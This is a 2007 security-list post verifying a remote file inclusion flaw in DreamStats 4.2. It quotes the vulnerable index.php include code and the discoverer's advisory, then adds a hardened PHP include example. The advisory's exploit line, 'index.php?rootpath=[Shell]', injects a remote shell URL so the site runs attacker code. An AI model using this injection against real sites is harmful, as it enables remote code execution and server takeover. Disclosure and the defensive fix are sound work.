[VIM] true: DreamStats V 4.2=(index.php)=>Remote File Include
str0ke
str0ke at milw0rm.com
Fri Feb 2 10:13:33 EST 2007
The section that matters is lines 17-22.
<index.php>
// +---------------------------------------------+
// | Copyright (c) 2004 – 2005 mnProjects |
// | http://www.mnprojects.com |
// | DreamStats System by Miguel Nunes |
// +---------------------------------------------+
error_reporting(E_ALL ^ E_NOTICE);
// D r e a m S t a t s
//
// For Call of Duty 2 version 1.0
define('in_main', true);
define('in_dreamstats', true);
if (!isset($_GET['server'])) {
################################### Includes ###################################
@include($rootpath . 'includes/ip_vers.php');
@include($rootpath . 'includes/core.php');
That's about as vulnerable as we get.
This is for version 4.2 (4.1 and below were not downloadable), 5.0
isn't vulnerable.
/str0ke
ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE at Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/upload/index.php?rootpath=[Shell]
********************************************************************************
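
For comparison with the index.php excerpt above, a hardened include pattern, added here as an example and not part of the original post or of DreamStats itself. It assumes that in 4.2 $rootpath is never assigned before the include() calls and is therefore populated from the request (as with register_globals=On); DS_ROOT, DS_INCLUDES and ds_resolve() are hypothetical names.

```php
<?php
// Added example, not DreamStats code. Assumption: $rootpath is unset before
// the include() calls, so a "rootpath" request parameter becomes the prefix.

// Vulnerable pattern from the excerpt (kept as a comment for comparison):
//   @include($rootpath . 'includes/core.php');

// Hardened form: the base directory comes from the script's own location,
// never from request data, and is a constant so nothing can overwrite it.
define('DS_ROOT', __DIR__ . DIRECTORY_SEPARATOR);   // hypothetical name

// Only files named here may be included (paths taken from the excerpt).
const DS_INCLUDES = [
    'includes/ip_vers.php',
    'includes/core.php',
    'html/serveroffline.php',
];

/**
 * Resolve an allowlisted relative path to an absolute file inside DS_ROOT.
 * Returns null when the name is not allowlisted, is missing, or resolves
 * outside the base directory (symlink or "../" escape).
 */
function ds_resolve(string $relative): ?string
{
    if (!in_array($relative, DS_INCLUDES, true)) {
        return null;
    }
    $base = realpath(DS_ROOT);
    $full = realpath(DS_ROOT . $relative);
    if ($base === false || $full === false) {
        return null;
    }
    // Containment check: resolved path must sit under the resolved base.
    return strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0
        ? $full
        : null;
}

foreach (['includes/ip_vers.php', 'includes/core.php'] as $file) {
    $path = ds_resolve($file);
    if ($path === null) {
        // Fail closed and visibly; the original "@" hid include failures.
        http_response_code(500);
        exit('DreamStats: required file unavailable');
    }
    require $path;
}
```

At the interpreter level, allow_url_include=Off (the default since PHP 5.2) and the removal of register_globals in PHP 5.4 block the remote-URL form of this bug independently of the application fix.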